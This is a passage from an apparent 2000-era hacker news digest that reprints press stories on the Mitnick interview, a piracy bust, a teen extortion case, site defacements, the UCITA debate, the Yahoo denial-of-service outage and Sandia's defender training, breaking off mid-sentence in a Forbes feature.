@HWA 102.0 HNN: Feb 7th; Mitnick to Give Live Interview ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Macki Kevin Mitnick, recently released after five years of imprisonment, will be the guest of this week's Off The Hook, Tuesday night at 8 pm EST. This is Mitnick's first live appearance since his release and the first time ever he will speak without being edited. (Note: These shows are archived for downloading .. - Ed) Off the Hook http://www.2600.com/offthehook @HWA 103.0 HNN: Feb 7th; Anti MPAA Leafletting Campaign a Huge Success ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Placebo Effekt Friday's worldwide leafletting campaign to protest recent MPAA lawsuits against hundreds of web sites for distributing the DeCSS software was an undisputed success. People around the world passed out flyers to help spread the word. In New York people handed out out more than 3000 flyers and London participants passed out flyers at such locations as the WB Movie Complex, and taped one to the window of the Disney Store and one to the window of the Warner Brothers Store. 2600.com http://www.2600.com/ @HWA 104.0 HNN:Feb 7th:Founding Member of PWA Busted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (See also section 23.0 - Ed) From HNN http://www.hackernews.com/ contributed by SmokEE A founding member of Pirates With Attitudes, Robin Rothberg, 32, of Chelmsford, MA was arrested by the FBI last week. He has been charged with conspiracy in U.S. District Court in Boston. According to an FBI affidavit, the PWA is a highly structured organization and the investigation is ongoing. One of the conditions of his bail agreement is that Rothberg must let the FBI spot check his e-mail. Boston Herald http://www.bostonherald.com/bostonherald/lonw/comp02042000.htm FBI nabs Chelmsford man in software piracy ring by Andrea Estes Friday, February 4, 2000 Federal officials say they've captured a leader of a worldwide band of e-pirates who surf the cyberseas in search of software plunder. Robin Rothberg, 32, of Chelmsford, is a founding member of Pirates with Attitudes, an international crew that steals popular titles from powerful companies and gives them away to its members for free, the FBI says. The group, snared by FBI agents in Chicago, is sophisticated and devious enough to have sought after software before it hits the shelves, authorities said. In December, FBI agents found Windows 2000 - which still hasn't been released - and Office 2000 premium, a program given to select customers for testing purposes. In all, agents found enough software to fill the memory of 1,200 average-sized personal computer hard drives. Rothberg, who until last week was a notebook software engineer for NEC Computer Services in Acton, was arrested yesterday and charged with conspiracy in U.S. District Court in Boston. Wearing a long ponytail and black leather jacket, he pleaded not guilty and was released without bail. According to an FBI affidavit, Pirates with Attitudes is a highly structured organization with different members assigned different tasks. ``Suppliers'' steal the programs from major software companies. ``Couriers'' deliver the files to PWA and ``crackers'' strip away the security codes that prevent piracy. The group, overseen by a council, screens members to ``minimize the risk of detection by authorities,'' according to an affidavit filed by FBI Special Agent Michael Snyder of Chicago. Rothberg, who is alleged to be a member of the council, was arrested after an informant helped steer Snyder, an MBA and computer expert, through its maze-like system. Agents located PWA's internet site, ``Sentinel,'' which is accessible only to authorized users. ``Members maintain access to PWA's site by providing files, including copyrighted software files obtained from other sources, and in turn are permitted to copy files provided by other users,'' wrote Snyder. ``Using the confidential informant's access codes, FBI agents logged onto Sentinel and viewed a directory listing thousands of copyrighted software titles available for downloading by PWA members,'' he wrote. So far only Rothberg has been arrested. Chicago authorities yesterday said the investigation is continuing. ``In the simplest terms, it's an organization that allowed its members to upload software to a site configured so it could store a substantial amount of software,'' said assistant United States Attorney Lisa Griffin. ``They could then download it into their own computers.'' Members give and take what they wish, officials said. ``It's a two-way street,'' said Randy Sanborn, spokesman for the United States Attorney's Office in the Northern District of Illinois. Officials wouldn't say whether members have to pay anything - such as a membership fee - for the service. Rothberg was downsized out of his job last week when the division he worked for ceased to exist, according to an NEC spokeswoman, who said the company has no plans to investigate Rothberg's job performance. Rothberg asked Magistrate Judge Robert Collings for permission to travel to California today for a job interview. And Rothberg said he had several more planned, his attorney Joseph Savage told Collings. Collings ordered him to stay off his computer except to look for a job, let the FBI spot check his e-mail, and get the court's permission if he wants to travel outside the Bay State. @HWA 105.0 HNN: Feb 7th; Teenager Busted for Attempted Cyber Extortion of $500 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles After attempting to extort a man for $500 a Toronto teenager has been sentenced to 100 hours of community service, and two years probation. He will also have to tell police how he managed to break into the mans computer to issue the extortion demand. The teenager was caught after he went to pick up the money left in a bag on a street corner near his home. Police also found counterfeit five and twenty dollar bills in the teenagers home. He has pleaded guilty to extortion, mischief, unauthorized use of a computer, fraudulent possession of a password, possession of counterfeit money and possession of instruments for counterfeiting. The Toronto Star http://www.thestar.com/back_issues/ED20000204/toronto/20000204NEW04b_CI-HACKER.html (Poor sod thought small, a measly $500, and went and got busted, makes ya sick dunnit? - Ed) Hacker, 14 tried to extort $500, court told Teen demanded payoff from businessman By Nick Pron Toronto Star Staff Reporter A 14-year-old boy who tried to extort $500 from a businessman after hacking into his computer will have to explain to police how he did it as part of his punishment. The teenager, who can't be identified under the Young Offenders Act, demanded the payoff be put in a red bag and left at the end of his street, just north of Toronto, a family court sentencing hearing was told yesterday. But the Toronto businessman, who also can't be identified under a court order, went to the police, and undercover officers secretly watched the teenager pick up the cash and take it home, the hearing was told. When officers searched his home, they found the teen had also been making counterfeit $5 and $20 bills. As well as explaining to police how he hacked into the businessman's computer, the teen must do 100 hours of community service, and serve two years probation. Crown Attorney Calvin Barry said since the Grade 9 student was so good with computers he would likely do his community work teaching basic computer skills. The teen pleaded guilty to extortion, mischief, unauthorized use of a computer, fraudulent possession of a password, possession of counterfeit money and possession of instruments for counterfeiting. Barry told the court the west-end businessman, who runs a computer store, used an Internet chat line to communicate with his customers. Someone hacked into his chat line account and changed the password, rendering his own secret code word useless. The businessman was able to trace through the Internet the person who hacked into his account. When he E-mailed the teen, he was told he had to pay $500 for the new password, the court heard. @HWA 106.0 HNN:Feb 7th: Japanese Plan to Fight Cyber Crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles The National Police Agency of Japan has requested $1.78 million from the country's fiscal 2000 budget to study electronic break ins. The agencies records indicate that there where 247 Internet crimes, including distributing child pornography, in Japan in 1999. This follows several high profile defacements of government web sites in recent weeks. Associated Press - via Tampa Bay Online http://ap.tbo.com/ap/breaking/MGIGU35UA4C.html Reports: Japanese Police Moving to Counter Wave of Internet Crime The Associated Press TOKYO (AP) - With hackers barraging government Internet sites, Japanese police announced plans to improve crime-fighting in cyberspace, newspapers reported Saturday. Beginning late last month, unidentified hackers began a high-profile campaign to crack state sites. And despite its love for just about everything high-tech, Japan is far behind other countries when it comes to tackling online crime. The Yomiuri Shimbun, Japan's largest paper, said the National Police Agency has requested $1.78 million from the country's fiscal 2000 budget to battle the problem. Police want to study how hackers break into Web sites and ensure user names are not being abused, the reports said. Agency officials were unavailable for comment. Agency figures showed that 247 Internet crimes, including distributing child pornography, were reported in 1999, nearly double the previous year, according to major Japanese newspapers. A bill aimed at improving user verification, a so-called digital signature bill, is due to be submitted to parliament soon, the Asahi Shimbun reported. Digital signatures allow people to use the Internet to buy and sell goods and services, it said. The police agency is urging that mandatory identity checks on people who apply for such signatures be made part of the bill, the paper said. The proposed legislation comes on the heels of a new law parliament passed last summer to make it illegal to access sites without the proper clearance. It takes effect this month. The Bank of Japan - the country's central bank - the Defense Agency, the Science and Technology Agency and the Transport Ministry have all reported being attacked by hackers, though they reported no damage. However, hackers into the Science and Technology Agency's homepage left a message alleging that Tokyo denied the Rape of Nanking, the Japanese army's massacre of as many as 300,000 civilians during the 1937-38 occupation of the Chinese city now known as Nanjing. @HWA 107.0 HNN: Feb 7th; Philippine President Web Site Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles The web site of Philippine President Joseph Estrada was defaced last week. The site had one page altered with comments containing sexual innuendoes. Officials said that security practices for the site would be reviewed. Business Today http://www.BusinessToday.com/techpages/erap02042000.htm Technology Today Philippine president's Erap.com Web site vandalized by hacker Bloomberg Friday, February 4, 2000 A computer hacker broke into the Internet site of President Joseph Estrada, inserting a sexual innuendo on an electronic document in the first successful vandalism of the Philippine leader's Web presence. The prankster placed the phrase, including a mention of homosexuality, on a week-old briefing paper on oil prices that was posted by the Office of the Press Secretary to the www.erap.com site. The posting was on the web site for almost a day before being removed. ``If I was older, I'd have a heart attack,'' said Ding Gagelonia, director of the Bureau of Broadcast Services, which oversees the site. The intrusion comes a week after two Japanese ministries had their Web sites defaced, and highlights the potential embarrassment awaiting vulnerable computers of the government and private companies as more firms in Asia conduct their businesses over the Internet. In the Japanese break-ins, the hackers erased data and placed links to pornography sites. Gagelonia said it was the first time the site, established in June 1998 to promote the policies of Estrada and obtain feedback from the public, had its contents altered. Previously, the site was the target of ``mail-bomb'' attacks where pranksters tried to shut it down by overloading its e-mail system. Those attacks were repulsed, he said. The site, which has a computer server in the presidential palace and another one in Europe, will review its security procedures, Gagelonia said. DesignNet Philippines Inc., a unit of the Engstrom Group of Sweden, developed the site. @HWA 108.0 HNN: Feb 8th: Software Companies Seek to Alter Contract Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime The Uniform Computer Information Transactions Act (UCITA) is still be pushed by powerful software companies through state legislatures across the nation. UCITA legislation would give software companies the ability to 'turn off' software remotely, it would provide for license agreements that could be changed with only an email notice, and it would ban critical software reviews through stronger license agreements. The software industry is aggressively lobbying for this legislation, saying that it is an overdue modernization of contract law to keep up with the pace of electronic commerce. It is expected that several states will actually pass this draconian law. LA Times http://www.latimes.com/news/front/20000204/t000011344.html Richard Stallman has written some interesting comments on UTICA, why it is bad, and why it should be defeated in every state. Open Letter From Richard Stallman http://www.hackernews.com/special/2000/utica.html For more information on UTICA see also: 4cite http://www.4cite.org Bad Software http://www.badsoftware.com LA Times; <Sorry story unavailable or in pay per view archives - Ed) Richard Stallman's letter Date: Mon, 31 Jan 2000 13:34:25 -0700 (MST) From: Richard Stallman gnu@gnu.org To: info-gnu@gnu.org Subject: Why We Must Fight UCITA [Please redistribute this widely wherever it is appropriate.] Why We Must Fight UCITA by Richard Stallman UCITA is a proposed law, designed by the proprietary software developers, who are now asking all 50 states of the US to adopt it. If UCITA is adopted, it will threaten the free software community(1) with disaster. To understand why, please read on. We generally believe that big companies ought to be held to a strict standard of liability to their customers, because they can afford it and because it will keep them honest. On the other hand, individuals, amateurs, and good samaritans should be treated more favorably. UCITA does exactly the opposite. It makes individuals, amateurs, and good samaritans liable, but not big companies. You see, UCITA says that by default a software developer or distributor is completely liable for flaws in a program; but it also allows a shrink-wrap license to override the default. Sophisticated software companies that make proprietary software will use shrink-wrap licenses to avoid liability entirely. But amateurs, and self-employed contractors who develop software for others, will be often be shafted because they didn't know about this problem. And we free software developers won't have any reliable way to avoid the problem. What could we do about this? We could try to change our licenses to avoid it. But since we don't use shrink-wrap licenses, we cannot override the UCITA default. Perhaps we can prohibit distribution in the states that adopt UCITA. That might solve the problem--for the software we release in the future. But we can't do this retroactively for software we have already released. Those versions are already available, people are already licensed to distribute them in these states--and when they do so, under UCITA, they would make us liable. We are powerless to change this situation by changing our licenses now; we will have to make complex legal arguments that may or may not work. UCITA has another indirect consequence that would hamstring free software development in the long term--it gives proprietary software developers the power to prohibit reverse engineering. This would make it easy for them to establish secret file formats and protocols, which there would be no lawful way for us to figure out. That could be a disastrous obstacle for development of free software that can serve users' practical needs, because communicating with users of non-free software is one of those needs. Many users today feel that they must run Windows, simply so they can read and write files in Word format. Microsoft's "Halloween documents" announced a plan to use secret formats and protocols as a weapon to obstruct the development of the GNU/Linux system(2). Precisely this kind of restriction is now being used in Norway to prosecute 16-year-old Jon Johansen, who figured out the format of DVDs to make it possible to write free software to play them on free operating systems. (The Electronic Frontier Foundation is helping with his defense; see http://www.eff.org/ for further information.) Some friends of free software have argued that UCITA would benefit our community, by making non-free software intolerably restrictive, and thus driving users to us. Realistically speaking,, this is unlikely, because it assumes that proprietary software developers will act against their own interests. They may be greedy and ruthless, but they are not stupid. Proprietary software developers intend to use the additional power UCITA would give them to increase their profits. Rather than using this power at full throttle all the time, they will make an effort to find the most profitable way to use it. Those applications of UCITA power that make users stop buying will be abandoned; those that most users tolerate will become the norm. UCITA will not help us. UCITA does not apply only to software. It applies to any sort of computer-readable information. Even if you use only free software, you are likely to read articles on your computer, and access data bases. UCITA will allow the publishers to impose the most outrageous restrictions on you. They could change the license retroactively at any time, and force you to delete the material if you don't accept the change. They could even prohibit you from describing what you see as flaws in the material. This is too outrageous an injustice to wish on anyone, even if it would indirectly benefit a good cause. As ethical beings, we must not favor the infliction of hardship and injustice on others on the grounds that it will drive them to join our cause. We must not be Machiavellian. The point of free software is concern for each other. Our only smart plan, our only ethical plan, is...to defeat UCITA! If you want to help the fight against UCITA, by meeting with state legislators in your state, send mail to Skip Lockwood dfc@dfc.org. He can tell you how to contribute effectively. Volunteers are needed most urgently in Virginia and Maryland, but California and Oklahoma are coming soon. There will probably be a battle in every state sooner or later. For more information about UCITA, see www.4cite.org and www.badsoftware.com. InfoWorld magazine is also helping to fight against UCITA; see http://archive.infoworld.com/cgi-bin/displayStory.pl?/ features/990531ucita_home.htm Copyright 2000 Richard Stallman Verbatim copying, distribution and display of this entire article are permitted in any medium provided this notice is preserved. (1) Other people have been using the term "open source" to describe a similar category of software. I use the term "free software" to show that the Free Software Movement still exists--that the Open Source Movement has not replaced or absorbed us. If you value your freedom as well as your convenience, I suggest you use the term "free software", not "open source", to describe your own work, so as to stand up clearly for your values. If you value accuracy, please use the term "free software", not "open source", to describe the work of the Free Software Movement. The GNU operating system, its GNU/Linux variant, the many GNU software packages, and the GNU GPL, are all primarily the work of the Free Software Movement. The supporters of the Open Source Movement have the right to promote their views, but they should not do so on the basis of our achievements. See http://www.gnu.org/philosophy/free-software-for-freedom.html for more explanation. (2) The system is often called "Linux", but properly speaking Linux is actually the kernel, one major component of the system (see http://www.gnu.org/gnu/linux-and-gnu.html). (3) Mozilla is free software; Netscape Navigator is not. The source for Netscape Navigator 4.0 is not available. (4) Sun's implementation of Java, and Blackdown which is a port of that, are not free software. Source code is unavailable for some parts; even where source has been released, the licenses are far too restrictive. @HWA 109.0 HNN: Feb 8th; Yahoo Taken Offline After Suspected DoS Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ First of several distrubuted mass DoS attacks on high profile sites .... - Ed From HNN http://www.hackernews.com/ contributed by Brian All of Yahoo.com was unreachable for several hours yesterday after what company officials claimed was a massive denial of service attack. While officials stress that there where no successful intrusions there still seems to be some confusion over what exactly happened. Some reports seem to indicate a bandwidth consumption attack with either Trinoo or TNF while other reports say that individual routers where pushed over and Wired says that it may have been due to 'misconfigured equipment'. (I hope this is straightened out soon so that the rest of us can protect ourselves.) NY Times http://www.nytimes.com/aponline/w/AP-Yahoo.html Associated Press - via Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500164907-500208998-500963784-0,00.html MSNBC http://www.msnbc.com/news/367156.asp Industry Standard - via Yahoo http://dailynews.yahoo.com/h/is/20000207/bs/20000207130.html Wired http://www.wired.com/news/business/0,1367,34178,00.html BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_635000/635048.stm AP/Nando; Hackers attack, overwhelm Yahoo! Copyright © 2000 Nando Media Copyright © 2000 Associated Press By TED BRIDIS WASHINGTON (February 7, 2000 8:36 p.m. EST http://www.nandotimes.com) - Computer vandals using a common electronic attack overwhelmed Yahoo!, the most popular site on the Internet, and rendered the flagship Web directory inaccessible for much of Monday. Yahoo! Inc. spokeswoman Diane Hunt said the company, worth roughly $93 billion, was the victim of hackers flooding its equipment with repeated electronic requests. The vandals did not gain access inside its computers, she said. The technique, called a denial of service attack, is similar to pranksters repeatedly dialing a company's telephone number to block all other incoming calls. Hunt said technicians determined that a flood of data requests coming from different computers on the Internet had overwhelmed its routers, which help direct traffic for the Web site. Technicians ultimately were able to identify the type of data and filter it out, which restored service. She said she was unaware whether the company had contacted the FBI, which coincidentally warned Web sites last month about a specific type of denial of service attack. "Our first priority has been identifying what was happening and then installing the filters to enable our users to access our services," Hunt said. In its advisory, the FBI's National Infrastructure Protection Center said it was "highly concerned about the scale and significance of these reports" and said vulnerabilities were "widespread, well-known and readily accessible on most networked systems." -=- Industry Standard; Monday February 07 09:16 PM EST Yahoo Unplugged by Hackers Elinor Abreu, The Industry Standard Yahoo did not have a good day. A hacker attack rendered the Web's No. 1 portal intermittently inaccessible Monday. Starting at about 10:30 a.m. PST, a coordinated, multi-point attack on Yahoo's California data center shut down the site sporadically, a Yahoo representative said. The so-called "distributed denial of service attack" works by bombarding servers with so much fake traffic that genuine traffic cannot get through. Redundant servers allowed some visitors access to the site. The company installed filters on its routers around 1:30 p.m. to block fake traffic and open up bandwidth to legitimate users, the representative said. No user information was compromised and some Yahoo services, like Web-based e-mail and its virtual shopping mall, were believed to have been unaffected. The main site was inaccessible by some as late as 4:45 p.m.. Yahoo has had small, short-term outages in the past, but nothing on this scale, the representative said. In August 1999, a glitch kept some customers out of their e-mail accounts for a few hours. However, that's nothing compared to the problems eBay, E-Trade, Amazon.com and Egghead have experienced. For instance, eBay outages last year - including one that lasted 22 hours - prompted infrastructure upgrades that reduced revenues by $5 million and resulted in a 26 percent drop in the company's stock price. The attack corresponded with a so-called "birds of a feather" meeting to discuss denial of service attacks at a conference in San Jose today sponsored by the North American Network Operators group, said Russ Cooper, editor of NTBugTraq. "I would assume that whoever did it was doing it to impress those people who were getting together to talk about them." The attack is fairly easy to do because there are Perl scripts and other executables that circulate that only require a server address to be inserted, he said. However, the fact that it was distributed indicates that "somebody was putting some thought behind it; coordinating it," Cooper said. Yahoo is ranked as the Internet's top Web site with 36.4 million unique visitors in December, according to Media Metrix. -=- Wired; Routers Blamed for Yahoo Outage by Declan McCullagh and Joanna Glasner 5:00 p.m. 7.Feb.2000 PST Most of the Yahoo network was unreachable for three hours on Monday as the company weathered what it described as a widespread malicious attack on its Web sites. Attackers reportedly laid siege to the Internet's second most popular destination at about 10:30 a.m. PST, snarling Yahoo's internal network and denying millions of visitors access to mail, schedules, and the directory service. An engineer at another company that receives Internet access from the same provider, Global Center, told Wired News the outage was due to misconfigured equipment. The person, who asked to remain anonymous, said that his firm also lost connectivity through Global Center's Sunnyvale, California, facility during the same time period due to apparent router problems, not hacker attacks. Details remained sketchy, with service provider Global Center blaming an intentional surge in traffic and Yahoo claiming a cadre of as-yet-unknown vandals fouled their system. No Web content appeared to have been altered or deleted. A Yahoo spokesperson called it a "coordinated distributed denial of service attack" against the company's San Francisco Bay Area data centers that originated from multiple places at the same time. The representative said the outage caused an "intermittent ability to access some, but not all, of our services." But the offline sites rank among the most prominent. Yahoo's highly visible yahoo.com, broadcast.com, and my.yahoo.com sites were unreachable, although some other properties such as Geocities remained unaffected. A likely explanation: Geocities receives its connection from Exodus, while the yahoo.com and other affected sites connect to the Internet through Global Center. "The Global Center network is not down. There've been no fiber cuts... This is a specific attack on Yahoo by external forces," said Secret Fenton, a spokeswoman for Global Center. "This affected accessibility to Yahoo, [which] hosts servers for its site at Global Center." Global Center -- formerly FrontierNet -- is owned by Global Crossing, a Bermuda telecommuniations firm. Other Global Center customers, such as Ziff Davis, MP3.com, and eToys.com, did not report any glitches. Neither Yahoo nor Global Center representatives provided technical details, but the snafu seemed to originate with a router, and experts began speculating on what could have been the cause. Jeff Schiller, MIT's network manager, said that a denial of service attack could be mistaken for router failure at first. "They might have thought they had a bad card in a router, and they shut down the router and replaced the card, and the problem didn't go away," Schiller said. "They probably replaced equipment and then discovered that it didn't solve the problem." Schiller speculated that any assault might have been a "Tribal Flood Network" attack. "If this is a denial of service attack, this is the one of the first attacks against a public business." The outage had the unusual effect of boosting the companies' shares. Global Crossing closed Monday at 50 5/16, up 1 1/8. Yahoo ended at 354, up half a point. On the Motley Fool discussion groups, investors kvetched that they couldn't access their mail, news, or movie info -- while scratching their heads over the apparent non-effect of the snafu. "Usually, when a portal has an outage the stock price goes down. Yahoo is holding up surprisingly well," one person wrote. Keynote Systems, an Internet monitoring firm, said the Yahoo outage began between 10:15 and 10:30 a.m. (PST). According to Media Metrix, only America Online reaches more people online than Yahoo. @HWA 110.0 HNN: Feb 8th; New Hack City Video ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond New Hack City, a secret hacker hangout in San Francisco, is the subject of a new eleven minute documentary by Joshua Backer. The film has been shown at the Rhode Island School of Design Senior Film Festival and the Animation/Video Festival of 1999 It has also received the prestigious RISD Murphy's Law Award. The film offers an interesting look into the private lives and minds of some well known hackers. Underground Films http://www.undergroundfilm.com/films/detail.tcl?wid=1001601 Streaming video. (Nice blank screen for an intro, since its only 11mins long... - Ed) @HWA 111.0 HNN: Feb 8th; Thailand E-commerce Site Stored Credit Cards on Mail Server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by raybanth An individual using the name Curador posted credit cards, claimed to be stolen from shoppingthailand.com, to Yahoo and then Geocities, last week. he was barely able to stay one step ahead of the sites taking the pages down. Officials in Thailand are now trying to determine if he did in fact break into the sites as he claimed. A review of the sites in question found that they stored the credit card numbers on the mail server. Bangkokpost.net - Warning, it is slow http://www.bangkokpost.net/today/080200_Business03.html Not Found The requested URL /today/080200_Business03.html was not found on this server. Apache/1.3.11 Server at www.bangkokpost.net Port 80 (Sorry ........ - Ed) @HWA 112.0 HNN: Feb 8th; Script Kiddie Training ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by turtlex By downloading the latest scripts from the web students at San Jose State University who are enrolled in the Sandia National Laboratory College Cyber Defenders Program are learning to become glorified script kiddies. (Maybe they are learning other stuff but that isn't mentioned in this article.) Washington Post http://washingtonpost.com/wp-srv/WPlate/2000-02/05/078l-020500-idx.html Launching a Counteroffensive in Cyberspace Program Training Corp of Experts in Computer Security By Vernon Loeb Washington Post Staff Writer Saturday, February 5, 2000; Page A03 LIVERMORE, Calif.—Eric Thomas hacks into Jason Arnold's computer with a few simple keystrokes, sniffing Arnold's password, hijacking his online session and stealing all the data on his screen. It's easy enough. Thomas launches the attack, an ingeniously malicious script of Czech origin that he's downloaded from the Internet, without Arnold ever knowing what hit him. "I'm watching everything he's doing right now," Thomas says, peering at his computer screen. He types in another command and declares victory: "I've taken over his connection!" As it happens, Thomas and Arnold are seated 10 feet apart here at the Northern California branch of Sandia National Laboratory, the nation's best-equipped computer attack simulation center. This is a place where it is quickly apparent that the thrust and parry between cyber-attackers and cyber-defenders has evolved further than non-experts may realize--and that the defenders are not as hapless as the American public may think. Both Thomas, 20, and Arnold, 18, are students at San Jose State University with a flair for computers. And both are just the type President Clinton had in mind last month when he proposed a national scholarship program to train cyber-security experts in return for four years of public service once they graduate. The two young men are part of the vanguard, already enrolled in Sandia's College Cyber Defenders Program, an initiative of computer security guru Fred Cohen. A principal member of Sandia's technical staff, Cohen, 43, is credited with inventing the computer virus as a graduate student at the University of Southern California in 1983. Like Clinton, he believes the current security environment is more precarious than ever, having spent the past 17 years pioneering defenses against all forms of cyber-attack. The attackers are becoming bolder and more sophisticated, Cohen said, while most people using computers know little--and seem to care even less--about protecting their machines. "This disconnect between technology and how people behave is getting broader, not narrower," Cohen said. But within the federal government, the picture is more encouraging. The Pentagon's computer defenses have improved by "an order of magnitude over the past five years," according to Cohen. While the government still makes its share of blunders in cyberspace, he said, its combined expertise for defending computer systems and waging cyberwar "is probably the best in the world--by a long ways." Such prowess isn't always readily apparent, with hackers taking down federal Web sites with regularity and Clinton sounding the alarm about cyber-terrorism in his budget proposal for fiscal 2001, which contains $2 billion in computer defense initiatives. But the Pentagon started funding the government's first computer emergency response team, or CERT, at Carnegie Mellon University 12 years ago after the so-called Morris "worm" was unleashed on the Internet and spread to 6,000 computers. Now most federal departments and agencies staff their own CERTs, the infantry in a growing cyber-security command structure. At the FBI, the National Infrastructure Protection Center is responsible for fighting cyber-crime, taking many of its leads from CERTs throughout the executive branch. At the Pentagon, a newly created center in Arlington called the Joint Task Force-Computer Network Defense is responsible for coordinating all computer defenses throughout the military. And at the General Services Administration, the Federal Computer Incident Response Center plays the same role for all civilian computer defenses. The price tag for these forces this fiscal year: $1.5 billion. Cohen himself is a one-man computer defense conglomerate, beginning with an 18-member research staff on cyber-security he directs here at the California branch of Sandia, which has its headquarters in New Mexico. Dressed in blue jeans and Birkenstocks, he explains that he developed the Cyber College Defenders Program for much the same reason Clinton proposed the $25 million scholarship program. "Ph.D. researchers are very expensive, they're hard to find, and the [national] labs don't pay as much as Silicon Valley," Cohen said. "It's build or buy these employees--and you can't buy them. So you have to build them." The son of two physics professors, Cohen is also an adjunct professor at the University of New Haven in Connecticut and an expert in the nascent field of computer forensics--tracking digital crimes. And he runs a private consulting business, advising companies on how to protect their computer systems. One of his tactics is to show clients that they are theoretically vulnerable to attacks that could disable factories, cause chemical spills, or steal millions of dollars. With such experience, Cohen is deadly earnest about the threat of cyber-war. He joined Sandia's technical staff, he said, because he saw "the potential for attacks on the critical infrastructure that could cost millions of lives and change the course of nations." Lance J. Hoffman, director of the Cyberspace Policy Institute at George Washington University, said most experts believe it is only a matter of time before a disastrous computer assault takes place. "The government does have resources in computer security and information assurance," Hoffman said. "But there is no such thing as perfect security. . . . I hope Congress does not wait until the aftermath of a cyber-disaster to take action." In Sandia's cyber-defenders program, Cohen downloads attack programs posted on hacker Web sites and assigns his students to run them against a variety of operating systems, figure out how they work and devise ways to defeat them. The suggested defenses are then posted on the Internet. "Attackers share, but defenders don't share as well," Cohen said. With the program nearing its first anniversary, students working part-time for $10 to $12 an hour have already modeled 400 attacks. Cohen has 1,800 more planned, and he figures his students will be caught up by the end of this summer, when the number of participants in the training program will double to 25. One day last month, Corbin Stewart, 28, who has a degree in history and is studying computer science at Las Positas Community College, launched his 100th simulated attack, a script called seyon exploit.sh. It comes with a disclaimer: "Please use in a responsible manner." But seyon exploit.sh was written with unconcealed malice, designed to allow whoever launches the code to gain root access to an improperly protected Unix operating system. "It's privilege expansion," Cohen said as Stewart fired away. "They become the super-user on your computer--they can read, write, modify anything. They can cause it to crash, they can use it to attack other computers, they can install sniffers, Trojan horses to get back in--it's all theirs." The threat, of course, is relative--and often grossly exaggerated, Cohen said. Hackers launching seyon exploit.sh or other commonly available attack scripts could damage somebody's home computer or business server, Cohen said, but it is highly unlikely that they could bring down U.S. military networks. Most hackers lack the expertise to penetrate sophisticated defenses or sustain their attacks, Cohen said. Hacking into a federal government Web site, he said, typically causes little more lasting damage than spray-painting a sign outside a government office. But when Clinton said last month that "hostile powers and terrorists can now turn a laptop computer into a potent weapon capable of doing enormous damage," he was not, in Cohen's opinion, exaggerating at all. A hacker may not be able to disrupt the Northeast's power grid, Cohen said, but the Russian government--with legions of computer scientists, years of expertise and a sophisticated understanding of how power systems work--probably could, if it wanted to. © Copyright 2000 The Washington Post Company @HWA 113.0 HNN: Feb 8th; Personal CyberWars ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench How long do grudges last in cyberspace? An interesting story covering the activities of one NASA tech guy trying to protect his network and a band of cyber intruders trying to break in. Forbes http://www.forbes.com/forbes/00/0221/6504068a.htm February 21, 2000 Don’t romanticize kids who hack their way into computers. They can go from mischievous to malicious in a click. A Private Little Cyberwar By Adam L. Penenberg JAY DYSON KNOWS THE EXACT moment his life began to unravel. It was 10 a.m. on Mar. 5, 1997, when Dyson, a techie for the National Aeronautics & Space Administration in Pasadena, Calif., discovered that NASA had been hacked. A gang puckishly named Hagis--Hackers Against Geeks in Snowsuits--had commandeered the "root" directory of some NASA computers, gaining partial control of the network and lacing it with password "sniffers" and "back doors" to let them return at will. They replaced NASA's home page with their own, decrying commercialization of the Internet with an almost comical ominousness. "All who profit from the misuse of the Internet will fall victim to our upcoming reign of digital terrorism," Hagis declared. "The commercialization of the Internet stops here." Dyson, part of a team charged with spotting intrusions and patching security holes, took this all too personally. Then he made his first mistake: He bashed Hagis online, posting the attack on his own Web site. "You are just a bunch of lame kids," he wrote. That seemingly meek counterpunch sparked a cyberwar over the next two years, pitting Dyson, 37, against two Hagis members known as Euphoria and Trout, or in hacker lingo, "u4ea" and "tr0ut." Hackers are often depicted as mischievous antiheroes of the computer revolution: Sure, they break in, but they don't really hurt anyone. Jay Dyson's tale points up a meaner side. His foes hacked two Internet service providers to get to him. They cracked his home business, harassed his wife and, he says, cost him his marriage. The digital intruders could do most anything they wanted to harass Dyson online; no one was able to stop them. He fears his tormentors won't cease--and now is plotting measures to stop them, himself. "I look at the trail of destruction Euphoria and Trout have left, and I still don't know anything about them," he says. "But I know my day will come." Iowa born and bred, Dyson discovered computers at age 6, when his father, an IBMer, took him to work one night and showed him a mainframe sending data to a teletype printer. "I was enthralled. Ihad to understand this magic."At age 15 he vowed to work for NASA someday. He dropped out of college in 1983, went into high tech and started doing work for NASA in 1995. At work his nickname is "the pit bull.""Once I sink my teeth into something,I don't stop until it stops struggling." Dyson calls himself a "white hat" hacker who blocks break-ins and alerts softwaremakers to security lapses. Online, he hangs out at hacker haunts, trading quips and tracking break-ins. Government sites are big game for hackers, and NASA is a natural target. At first, Hagis seemed harmless. It has breached Yahoo and propeller-head sites Slashdot and Rootshell. Each time, it engaged in a little nanny-nanny-boo-boo and made demands for the release of a jailed hacker hero, 